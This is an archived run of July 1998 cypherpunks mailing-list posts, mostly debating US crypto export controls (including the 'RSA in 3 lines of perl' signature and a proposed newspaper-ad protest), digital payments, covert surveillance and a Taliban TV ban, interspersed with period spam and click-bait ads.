The Philodox Symposium on Digital Bearer Transaction Settlement
  July 23-24, 1998: <http://www.philodox.com/symposiuminfo.html>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sales@no-isp.com
Date: Fri, 10 Jul 1998 11:04:46 -0700 (PDT)
To: cypherpunks@toad.com
Subject: New Way to Access Internet
Message-ID: <899909450@no-isp>
MIME-Version: 1.0
Content-Type: text/plain


Dear User,


We do not wish to send e-mail to anyone who does not want to receive it.
If you are not interested , please reply to sales@no-isp.com with "REMOVE"
in the subject line and you will be promptly removed from our database.
Thank you for your patience and we apologize for intruding on your time 
and privacy.

If, however, you are looking for a fast and easy way to dial into the
Internet whenever you want and from wherever you are, then read on.

Our *Instant Access* service gives you *Internet-on-demand* and you DON'T
need to subscribe to an Internet Service Provider !!

No monthly charges and no setup fee

No registration of any kind required

No Proxy in the way

Absolute ANONYMOUS login !!

Unlimited personal access duration

Fast connection

Access from all over the world

Nothing is censored on this network

Visit our site at www.no-isp.com for full details now.


Happy surfing!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <Hua@teralogic-inc.com>
Date: Wed, 8 Jul 1998 15:48:00 -0700 (PDT)
To: "'Chris Liljenstolpe'" <jim.burnes@ssds.com
Subject: RE: RSA in perl illegal to export (Re: Junger et al.)
Message-ID: <413AC08141DBD011A58000A0C924A6D52C35AA@mvs2.teralogic-inc.com>
MIME-Version: 1.0
Content-Type: text/plain


I still have a few of those shirts left (I ate the cost ... along with a
few copies of Secret Power).

If anyone wants to do this, I will be happy to donate the T-shirt (and
be an "arms" supplier).

In fact, one of the people who expressed an interest in buying the
T-shirt wanted to send one to Dave Letterman (Letterman was hot at the
time).  Did you ever do it?

Ern

	-----Original Message-----
	From:	Chris Liljenstolpe [SMTP:cds@mcmurdo.gov]
	Sent:	Wednesday, July 08, 1998 3:31 PM
	To:	Adam Back; jim.burnes@ssds.com
	Cc:	Ernest Hua; egerck@laser.cps.softex.br;
cypherpunks@toad.com; cryptography@c2.net
	Subject:	Re: RSA in perl illegal to export (Re: Junger et
al.)

	Greetings,

		There are t-shirts out there with both human readable
and
	machine readable (bar code) versions of the RSA in 3 code....
Wear it
	when boarding an international flight....  They even state that
they
	are a munition and ITAR controlled in BIG letters on the back...


		Chris


	On Wed, Jul 08, 1998 at 11:04:44AM +0100, Adam Back wrote:
	> 
	> Jim Burnes writes:
	> > Obviously there is no difference between 10 lines of PERL
and
	> > 1500 lines of assembler (or machine code).  
	> 
	> One of Peter Junger's examples (I think used in the case) is
the RSA
	> in 2/3 lines.  He actually obtained the US export
administrations
	> written decisions on which of a small collection of titchy
programs
	> was exportable.  RSA in 3 lines of perl they stated was
illegal to
	> export.
	> 
	> So fun things with RSA are possible because they have decided
that it
	> is not exportable, so perhaps you could export it on a floppy,
or as
	> your .signature, with media cameras rolling, and try to get
yourself
	> arrested for willful violation of dumb export laws.
	> 
	> Adam
	> -- 
	> Have you exported RSA today? -->
http://www.dcs.ex.ac.uk/~aba/rsa/
	> 
	> print pack"C*",split/\D+/,`echo
"16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
	>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc
`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Wed, 8 Jul 1998 07:26:19 -0700 (PDT)
To: "Trei, Peter" <ptrei@securitydynamics.com>
Subject: Re: Junger et al.
In-Reply-To: <D104150098E6D111B7830000F8D90AE8017909@exna02.securitydynamics.com>
Message-ID: <35A38178.4B276D1F@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain


Trei, Peter wrote:
> 
> > -----Original Message-----
> > From: Mok-Kong Shen [SMTP:mok-kong.shen@stud.uni-muenchen.de]

> > Put the source code on a neuro-disk and you can export it under
> > any crypto law that can ever be invented till eternity.

>         Tell that to the thousands forbidden to leave the nations
>         which claim or claimed to own them, on the basis that they
>         once had access to state secrets.

I know the unfortunate truth of that. But I was excluding the
exceptions and referring to disks that are new.

>        I have no doubt that similar restrictions could be put in
>        place in other nations.

It is my conjecture that the chance of that happening in some
countries that are not considered to be democratic is lower.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Wed, 8 Jul 1998 13:44:29 -0700 (PDT)
To: Cypherpunks@toad.com (coolness)
Subject: A Mirror - 'Don't be blue if you should be green'
Message-ID: <d278c11f.35a3d9e5@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry, that server that address I gave you on earlier seems to be all locked
up, so I created a mirror, check it out,

Stan,
The Desecration of 'The Dark Side of the Moon'
http://members.aol.com/RealityWal/DarkSide/darkside.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff.Nisewanger@Eng.Sun.COM (Jeff Nisewanger)
Date: Wed, 8 Jul 1998 17:02:24 -0700 (PDT)
To: cds@mcmurdo.gov
Subject: Re: RSA in perl illegal to export (Re: Junger et al.)
Message-ID: <199807090001.RAA20366@puuoo.eng.sun.com>
MIME-Version: 1.0
Content-Type: text/plain


> 	There are t-shirts out there with both human readable and
> machine readable (bar code) versions of the RSA in 3 code....  Wear it
> when boarding an international flight....  They even state that they
> are a munition and ITAR controlled in BIG letters on the back...

	Or take out a classified ad (so to speak) in the New York Times
and have it published on paper.



	Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <Hua@teralogic-inc.com>
Date: Wed, 8 Jul 1998 17:18:22 -0700 (PDT)
To: "'Chris Liljenstolpe'" <jim.burnes@ssds.com
Subject: RE: RSA in perl illegal to export (Re: Junger et al.)
Message-ID: <413AC08141DBD011A58000A0C924A6D52C35AE@mvs2.teralogic-inc.com>
MIME-Version: 1.0
Content-Type: text/plain


Would someone who has actually scanned this T-shirt in please let us
know how you did it (which equipment, what software, etc.)?

Thanks!

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 8 Jul 1998 14:38:58 -0700 (PDT)
To: jya@pipeline.com (John Young)
Subject: Re: Covert Access to Data and ID
In-Reply-To: <199807081547.LAA21623@camel14.mindspring.com>
Message-ID: <199807082138.RAA12934@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:

| If this is logging (and related retrieval) is done covertly, 
| encryption could thereby become a falsely reassuring 
| cloak of privacy.
| 
| Dave thinks devices like these are surely in the works,
| and he can say more about their sponsors, technologies 
| and implementations.

	Keystroke logging technology exists commercially as a result
of the shit reliability of commercial OSs.  Turning one of them
quite stealth wouldn't be hard; they're very innocous as is.

	Also note things like the recent MS 'send chunks of ram in
Word documents' bug in Word for the Mac.  (Actually an OLE bug.)

	The benefit to encryption is not that it makes your data
secure, but that it allows you to communicate safely in the presense
of adversaries.  (Rivest's definition.)

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Wed, 8 Jul 1998 17:00:17 -0700 (PDT)
To: Chris Liljenstolpe <cds@mcmurdo.gov>
Subject: Re: RSA in perl illegal to export (Re: Junger et al.)
In-Reply-To: <19980708223047.H93@erebus.mcmurdo.gov>
Message-ID: <Pine.SUN.3.91.980708184354.27484A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Jul 1998, Chris Liljenstolpe wrote:

> Greetings,
> 
> 	There are t-shirts out there with both human readable and
> machine readable (bar code) versions of the RSA in 3 code.... 

	RSA in 3 or RSA in 5?  Is there a new version?

	Now, all *real* Nettites know that the original 
	shirts were by Joel Furr, are no longer for sale, 
	and have an X-ed out Bill of Rights (or excerpts
	thereof) on the back, rather than any of this ITAR
	stuff.  And!!  It glows in the dark.  Rock rock.
 
						-Caj

	"This shirt is a ... " [squints] "... munchkin?"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Steve Orrin" <privsoft@ix.netcom.com>
Date: Wed, 8 Jul 1998 16:15:28 -0700 (PDT)
To: "Cypherpunks Toad" <cypherpunks@toad.com>
Subject: test
Message-ID: <199807082314.SAA19949@dfw-ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


test




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Birch <daveb-lists@mail.hyperion.co.uk>
Date: Wed, 8 Jul 1998 12:10:46 -0700 (PDT)
To: "Ryan Lackey" <rdl@mit.edu>
Subject: Re: IP: "CyberCash can't oust credit cards"
Message-ID: <1312194872-63102733@hyperion.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Ryan Lackey said

>I think resistance to new payment schemes on the part of a merchant is in 
>cost and effort to set up.  Having a free apache commerce plugin which 
>handles
>a variety of payment systems...

What's wrong with this model is that it imports historical physical 
models that are irrelevant on the Net. Why does the merchant take 
payments at all?

Imagine this scenario: you go into the Good Guys and buy a Walkman. The 
clerk gives you a ticket. You go round to your branch of Wells Fargo and 
get a cashiers cheque made out to the merchant, walk round to the 
merchant's branch of BankAmerica -- or BankBank, or whatever it's called 
now :) -- and deposit the cheque in the merchants account. BankBank gives 
you a receipt which you take back to the Good Guys and pick up your 
Walkman. Now, apart from all of the walking around, this is not a bad 
system. The Good Guys don't need cash registers, links to First Data etc 
etc. The Good Guys don't need to put up stickers saying "we take Visa", 
because the bank takes everything. The Good Guys don't care how you paid.

The bank is much better placed than the merchant to handle the risks 
associated with payments and therefore the information asymmetries 
associated with the payment are significantly reduced (there's a good 
article about this in the Federal Reserve Bank of Atlanta's Economic 
Review, 1Q98). On the Net, there's no walking around.

In the physical world, it clearly makes no sense for every bank to build 
a network out to every merchant: hence it makes sense to have physical 
payment instruments (e.g. notes, cheques) and credit/charge cards. On the 
Net, though, every participant is connected. When you buy a book from 
Amazon, what is the point of sending your credit card details to Amazon 
just so that they can send the details on to an acquiring network, 
third-party processor etc. Surely it makes more sense for merchants to 
have deals with payment agents (this is the model in OTP, Smart Access 
etc). When you press the button marked "Pay" on your browser, wouldn't it 
be more natural for a message to go to your bank than to the merchant?

Thus, I get a "ticket" from Amazon saying "you owe $20 for this book". I 
pass the ticket to a payment agent (which may be a bank) and pay them 
(the negotiation being between my wallet and the agent"). The agent sends 
me a receipt to keep: I send the receipt to Amazon and they send me a 
book. Alternatively, perhaps the receipt let's me play Doom for a month 
or get ten upgrade to an item of software or whatever.

All Amazon care is that the money has been paid: what do they care 
whether I used DigiCash or Mondex, Visa or MasterCard? You might argue 
that the merchant would discount for cleared funds (pay by Mondex and get 
2% off) but I think that its frankly too much bother for them to work out 
N different prices by M different payment methods. I would imagine that 
just a merchants run loyalty schemes ("double points if you buy 
cornflakes") then so would payment agents ("double points for DigiCash") 
but each could operate their business independently.

I would argue that the idea that merchants take payments is outdated. 
Since merchants don't care about cypherpunk favourites such as bearer 
instruments and anonymity, they'll be perfectly happy to have an 
acquiring account with BigBank and get a statement at the end of the 
month that details the payments taken and says "Money collected $1000, 
our fee $50, deposited to your account $950". Now, the merchant hasn't 
had to buy a commerce server, negiotiate 10 different acquiring 
agreements, implement SET or do anything else. Hey, so it's 5%: so what?

Regards,
Dave Birch.

=== mailto:daveb@hyperion.co.uk ===== http://www.hyperion.co.uk/ ===





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 8 Jul 1998 17:37:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: DoD Plans Global Domestic Invasion
Message-ID: <199807090036.UAA06849@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


DoD released today the text of a June 11 speech which
describes how the military is planning for the first time
in US history to establish a homeland defense command,
to operate inside US borders for protection against terrorism
and weapons of mass destruction:

   http://jya.com/dsd061198.htm

A special unit will handle cyber threats.

The CINC-US will be a vast increase over the traditional
role of domestic law enforcement by FBI, ATF and other
federal, state and local authorities, lately supplemented
by the National Guard, FEMA, PCCIP, and the newly
formed COIA at Commerce and the President's special 
office on domestic terrorism.

Deputy Secretary of Defense Hamre said the command
will work with the newly formed Defense Threat Reduction
Agency (DTRA) which will be under C4I of DoD.

Another press release today covered Hamre's June 22 
speech in Vienna where he outlined similar measures for 
European defense through NATO:

   http://jyacom/dsd062298.htm

Finally, the Wash Post had a report today on DoD's
attempt to come up with workable plans for offensive
cyberwar -- which is claimed to be the serious first 
serious competitor for the nuclear threat in fifty years:

   http://jya.com/cyber-how.htm

It says that a component of cyberwar offense is regular prowling
of other countries networks and military command systems 
for the purpose of "pre-planning the battlefield."

That this is the way DoD justifies ignoring the limitations of 
intel agencies' need to get presidential approval for invading 
the borders of other countries. "Cyberspace is borderless," 
says the Pentagon.

Many covert prowling, surveilling and crashing tools
are in operation or poised to take down systems like those
of the nuclear command and control systems of 
Pakistan and India should the need arise. One guy
brags that any one of a dozen experts in the US 
"could take out a country in six hours" by disrupting
cyber infrastructure, and that might be looming for
the US.

Is it true infowar, or is it whistling in the dark psy war:
"my megaherz-death bombers are sneakier than yours"?

So, it appears that key stroke logging and MS/Intel's vicious 
"wired for management" are kidstuff cheapskate knockoffs of
far worse invasive technology pouring dollars into Wintel
labs and fabs.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 8 Jul 1998 18:19:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: DoD Plans Global Domestic Invasion
In-Reply-To: <199807090036.UAA06849@dewdrop2.mindspring.com>
Message-ID: <199807090119.VAA03382@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


To not accuse only follow-the-leaders Wintel, that last paragraph 
should have been:

So, it appears that key stroke logging and MS/Intel's vicious 
"wired for management" are kidstuff cheapskate knockoffs of
far worse invasive technology pouring dollars into much
DIRTier than Wintel labs and fabs.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sales@electronicpromotion.com
Date: Wed, 8 Jul 1998 22:04:43 -0700 (PDT)
To: sales@electronicpromotion.com
Subject: INCREASE YOUR CASHFLOW NOW!!!!!
Message-ID: <199807090504.WAA14973@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Do you wish there was a way to easily communicate directly with
potential customers who already have an interest in your particular 
product or service? Now with ElectronicPromotion Direct Email
you can! 

ElectronicPromotion offers this highly targeted alternative that quickly 
delivers your email to individuals who are more likely to respond to an
email regarding a topic they have made a post about in a newsgroup
or in a webpage.

http://www.electronicpromotion.com
or Call 813.781.9782 for more info

Because individuals have an interest in specific topics, they are more
likely to read the message. Response rates to ElectronicPromotion Direct Email
are exceptional.. This results in the recipient actually visiting your web site because
they have an active interest in your product or service. Compared to
postal mailings, direct email is both less expensive and more effective. 


***Did you know?
     Nearly 50 percent of the U.S. population, or 135 million 
     people, will communicate via email by 2001. Fifteen percent 
     of the U.S. population (approximately 30 million adults 16 and over) 
     use email now.  (Forrester Research) 

Why wait your target market is on the net now send your ElectronicPromotion 
Announcement TODAY!!!

We also offer 100% Guaranteed Results so please visit
http://www.electronicpromotion.com 
Or call 813.781.9782 to get started ASAP

==============================================================
If you would like to be blocked from any further mailings reply with "REMOVE"
as the subject. You will be promtly removed.
=============================================================== 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Liljenstolpe <cds@mcmurdo.gov>
Date: Wed, 8 Jul 1998 15:37:10 -0700 (PDT)
To: Adam Back <jim.burnes@ssds.com
Subject: Re: RSA in perl illegal to export (Re: Junger et al.)
In-Reply-To: <Pine.LNX.3.96.980707120752.562A-100000@mothra.fastrans.com>
Message-ID: <19980708223047.H93@erebus.mcmurdo.gov>
MIME-Version: 1.0
Content-Type: text/plain


Greetings,

	There are t-shirts out there with both human readable and
machine readable (bar code) versions of the RSA in 3 code....  Wear it
when boarding an international flight....  They even state that they
are a munition and ITAR controlled in BIG letters on the back...


	Chris


On Wed, Jul 08, 1998 at 11:04:44AM +0100, Adam Back wrote:
> 
> Jim Burnes writes:
> > Obviously there is no difference between 10 lines of PERL and
> > 1500 lines of assembler (or machine code).  
> 
> One of Peter Junger's examples (I think used in the case) is the RSA
> in 2/3 lines.  He actually obtained the US export administrations
> written decisions on which of a small collection of titchy programs
> was exportable.  RSA in 3 lines of perl they stated was illegal to
> export.
> 
> So fun things with RSA are possible because they have decided that it
> is not exportable, so perhaps you could export it on a floppy, or as
> your .signature, with media cameras rolling, and try to get yourself
> arrested for willful violation of dumb export laws.
> 
> Adam
> -- 
> Have you exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/
> 
> print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
> )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ricki514@msn.com
Date: Wed, 8 Jul 1998 23:09:25 -0700 (PDT)
To: ricki514@msn.com
Subject: Go for the gold.
Message-ID: <199807090609.XAA19899@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



<B>Adults Only Website !

CHECK TO SEE IF YOU ARE A WINNER!!!!!

CLICK HERE
</B>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 8 Jul 1998 14:29:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199807082129.XAA00872@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain




I made another page, which details what Capital records did to Dark Side of
the Moon when they reissued on cd.  Guess what they covered-up.  :-)  Check it
out,

Stan,
The Desecration of 'The Dark Side of the Moon'
http://members.tripod.com/StanSqncrs/DarkSide/darkside.html









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Wed, 8 Jul 1998 22:47:28 -0700 (PDT)
To: Jeff Nisewanger <Jeff.Nisewanger@Eng.Sun.COM>
Subject: "Classified" Ads  (Was Re: RSA in perl illegal to export)
In-Reply-To: <199807090001.RAA20366@puuoo.eng.sun.com>
Message-ID: <Pine.SUN.3.91.980709003238.27646A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Jul 1998, Jeff Nisewanger wrote:

> > 	There are t-shirts out there with both human readable and
> > machine readable (bar code) versions of the RSA in 3 code....  Wear it
> > when boarding an international flight....  
> 
> 	Or take out a classified ad (so to speak) in the New York Times
> and have it published on paper.

	Woo!  This sounds like an easily doable, easily managable
	mass protest.

	We start a mailing list or website (a website would be better)
	of volunteers and the newspapers they intend to place ads in.
	Major papers would hopefully get multiple copies of the ad in
	multiple sections.  All on the same day.

	But then, they often charge per word, and one gigantic string
	of nonsense might not obey any newspaper's rules.

	But I like the idea of organizing a classified add campaign,
	or such.  Blitzing the nationwide press with a large number
	of tiny notes, all one day.  Maybe instead they could all 
	contain a URL, pointing to a carefully written, agreed-upon, 
	readable and fairly exhaustive collection of info about the 
	issues at hand.  Well, maybe they shouldn't all point to
	the same machine....

	Ferget just signing petitions, dammit.  Petitions are for
	wimps.  Ask folks to participate by buying an ad.

	I mean, communication is what a lot of us here specialize
	in.  And in our protocols, we have Alice and Bob writing out
	hundreds of anonymous money orders, broadcasting public
	keys via radio from prison, and hiding love letters in 
	GIFs of farm animals.  Surely there's enough imagination 
	here to turn even a small fund into a very effective PR
	campaign.
	
							-Caj

> 	Jeff

 ,oooooooo8     o     ooooo@math.niu.edu  --  http://www.math.niu.edu/~caj/
o888'   `88   ,888.    888                                                 
888          ,8'`88.   888      "The user's going to pick dancing pigs     
888o.   ,oo ,8oooo88.  888          over security every time."             
`888oooo88 o88o  o888o 888                          -Bruce Schneier        
____________________8o888'_________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Wed, 8 Jul 1998 21:25:38 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Elvis stole my panties/Whip me please!
Message-ID: <19980709010446.28505.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/html

CLICK FOR STUFFED: Wednesday July 8 1998

<img src=http://stuffed.net/98/7/8/cover.gif
width=300 height=380 border=0 alt='Click Here For STUFFED, The NEW Daily Tabloid
 News And Babes Color Supplement From Eureka!'>

Click here to read it: http://stuffed.net/98/7/8/



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RealNetworks News <announce@dmail1.real-net.net>
Date: Thu, 9 Jul 1998 07:46:29 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Speed Up Your Dial-up Connection!
Message-ID: <199807091446.HAA24275@dmail3.real-net.net>
MIME-Version: 1.0
Content-Type: text/plain


Dear RealPlayer User,

I'm excited to tell you about a great software
product that will dramatically speed up your
dial-up connection for faster Internet access and
the availability of the RealPlayer and RealPlayer
Plus G2 'pre-beta' preview releases. 

TWEAKDUN ACCELERATES YOUR INTERNET CONNECTION

By optimizing your Windows 95 Registry internet 
settings, TweakDUN by Patterson Design Systems
eliminates fragmentation of data packets allowing
for faster Internet data transfer rates.

This means faster browsing, quicker downloads, and
improved Internet performance.

TweakDUN won ZDNet Editors' Pick with a 5-star rating!

   "TweakDUN is the most-cost efficient option 
    available for boosting your 'net speed."
         -- Stroud's Consummate Winsock
            Applications Review 4/21/98

You can order and download your copy of TweakDUN,
from RealStore simply by visiting:

  http://www.realstore.com/specials/tweakd.html

TweakDUN is guaranteed to speed up your dial-up connection
or your money back. (Return required within 30 days of purchase
for refund.)

-------------------------------------------------------
NEW REALPLAYER AND REALPLAYER PLUS G2 NOW AVAILABLE

I also wanted to tell you about the 'pre-beta' preview
release of RealPlayer and RealPlayer Plus G2. These new
G2 players deliver dramatic quality improvements,
including entirely new features like a 10-channel
graphic equalizer and more. To download now, visit:
--> http://www.real.com/50/tweakpre.html
-------------------------------------------------------

Thank you for using RealNetworks products,

Maria Cantwell
Senior Vice President
RealNetworks, Inc.
Seattle, WA  USA

---------------------------------------------
 ABOUT THIS E-MAIL

 This e-mail was sent to users of RealPlayer
 software who indicated a preference during
 the download or installation process to receive
 notification of new RealNetworks products or
 services via e-mail.

 For information about subscribing to or
 unsubscribing from future announcements, visit
 http://www.real.com/mailinglist/index.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RAPHAEL_PHAN_CHUNG_WEI <e9710041@unitele.com.my>
Date: Wed, 8 Jul 1998 18:14:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <Pine.SOL.3.90.980709085659.10720A-100000@ultra-18>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Thu, 9 Jul 1998 01:14:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Covert Access to Data and ID
In-Reply-To: <199807081547.LAA21623@camel14.mindspring.com>
Message-ID: <35A47BD1.1F51A0D5@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:

> Thus, the more general question Dave has raised is how
> widespread is the development and implementation of
> technolgies for covert surveillance on the Web and in
> desktop boxes -- happily spreading quietly while attention
> is focussed on the very encryption which it will circumvent?

I don't know whether it is relevant but there is recently an
announcement of a conference on intrusion detection. Perhaps
one gets some relevant research results there presented.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Thu, 9 Jul 1998 10:13:32 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - July 9, 1998
Message-ID: <199807091702.MAA14127@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain



=============================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

WIRELESS IT '98, The Next Generation in Personal
Computing & Communications October 12-14,
Las Vegas, Nevada Call (202) 785-0081 for more information!
=============================================


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fr0gFAQ@aol.com
Date: Thu, 9 Jul 1998 10:43:03 -0700 (PDT)
Subject: Hey!
Message-ID: <b5c5af74.35a4ef58@aol.com>
MIME-Version: 1.0
Content-Type: text/plain

 


To: Fr0gFAQ@aol.com
Subject: Hey!
From: Fr0gFAQ@aol.com
Date: Thu, 9 Jul 1998 11:30:53 EDT

Hello, <A HREF="http://www.fortunecity.com/village/hawtrey/216/index.html">
Click Here</A> Please!
Thanx




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Thu, 9 Jul 1998 13:28:00 -0700 (PDT)
To: attila@hun.org
Subject: Re: FC: Forget Internet restrictions -- how about banning TV?
In-Reply-To: <Pine.BSF.3.96.980709192532.4532A-100000@hun.org>
Message-ID: <199807092027.NAA02656@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


attila writes:
> 
> On Thu, 9 Jul 1998, Declan McCullagh forwarded from TIME:
> 
> >...
> >   The revolution will not be televised -- at least not in Afghanistan.
> >   The Taliban government today banned TV, and gave Afghans 15 days to
> >   get rid of all sets and VCRs. After that, if the organization's
> >   enforcers find one in your house, it will be destroyed and you will be
> >   punished.
> >...
> 
>     sounds good to me; I've raised 5 children who know how to _read_.
> 

[rant against tv deleted]


While I agree that TV is a brain-sucking void, banning any
form of dissemination of information is a Bad Thing and
a sign of serious government oppression.


First the came for the TV sets, and I didn't say anything because
TV is merely bread and circuses for the masses.

Then they came for my radio, and I didn't complain because
I can't get Rush very good anyhow.

Then they came for the newspaper, and that really pissed me off, so
I wanted to protest.  I wanted my protest to get a lot of exposure, so
I went to call the TV and radio stations but they don't exist any more.


>     policy goals of Hillay's Global Village where everybody is just
>     another butterscotch pudding to her recipe.


I'd rather be dealing with Hillary than the Talliban.


-- 
Eric Murray  Chief Security Scientist  N*Able Technologies  www.nabletech.com
(email:  ericm  at  lne.com   or   nabletech.com)          PGP keyid:E03F65E5




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harvey Rook (Exchange)" <hrook@exchange.microsoft.com>
Date: Thu, 9 Jul 1998 14:27:38 -0700 (PDT)
To: "'attila'" <cypherpunks@toad.com>
Subject: RE: FC: Forget Internet restrictions -- how about banning TV?
Message-ID: <2FBF98FC7852CF11912A00000000000108A78AE3@DINO>
MIME-Version: 1.0
Content-Type: text/plain


So attila, Afghanistan will be a better place because they've banned
television?

I think you miss the point.

Harv.

From: attila [mailto:attila@hun.org]
> Sent: Thursday, July 09, 1998 12:37 PM
> To: Declan McCullagh; cypherpunks
> Subject: Re: FC: Forget Internet restrictions -- how about banning TV?
> 
> 
> On Thu, 9 Jul 1998, Declan McCullagh forwarded from TIME:
> 
> >...
> >   The revolution will not be televised -- at least not in 
> Afghanistan.
> >   The Taliban government today banned TV, and gave Afghans 
> 15 days to
...deletia...
> 
>     sounds good to me; I've raised 5 children who know how to _read_.
> 
>     I've never owned a television, never saw the need to bring cancer
>     into the home. 
...deletia...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MCROACH@delphi.com
Date: Thu, 9 Jul 1998 12:32:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: journalist seeking help...
Message-ID: <01IZ79RMKJWI8ZYMJZ@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain





Dear Cypherpunks:

I write for the New York Times Magazine. My editor 
wants to profile, as he put it, "a group of hackers 
who've gone legit" and now do consulting for 
corporations. Paul Kocher of Cryptography Research 
thought you guys might have a couple suggestions. He
mentioned a co-op in Boston, but couldn't recall their
name. Also -- anyone know what Robert Morris Jr. is up
to? Or how to contact him? 

Thanks very much.

Mary Roach




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lithron <lithron@bellsouth.net>
Date: Thu, 9 Jul 1998 12:38:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: "Classified" Ads  (Was Re: RSA in perl illegal to export) (fwd)
In-Reply-To: <199807091306.IAA03984@einstein.ssz.com>
Message-ID: <35A51BD8.4378ADC9@bellsouth.net>
MIME-Version: 1.0
Content-Type: text/plain


This does sound like a fun way to protest.  I'd be willing to donate 
a little cash if people would send me copies of the papers that it
gets 
put in.  Heh.. it would be good for a laugh to visit an airport on
that 
day just to see all the people taking news papers with them on 
international flights :)

Anyone want to take a stab at a date?

lithron at bellsouth dot net

Jim Choate wrote:
> 
> Forwarded message:
> 
> > Date: Thu, 9 Jul 1998 00:47:18 -0500 (CDT)
> > From: Xcott Craver <caj@math.niu.edu>
> > Subject: "Classified" Ads  (Was Re: RSA in perl illegal to export)

[snip snip snip]

> [text deleted]
> 
> I like this idea a lot also. I'm definitely interested...
> 
> Let me look into it but I suspect I could cover Austin, Houston, Dallas, Ft.
> Worth, & El Paso in Tx. To ensure accuracy the actual text should be faxed in
> if not sent via email.
> 
> Other than a list of current objectionable issues what else should be sent
> in? It would be worth a point or two to have it signed 'Publius'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <vjb@gil.com.au>
Date: Wed, 8 Jul 1998 23:35:28 -0700 (PDT)
To: (Recipient list suppressed)
Subject: One Nation going back on-line
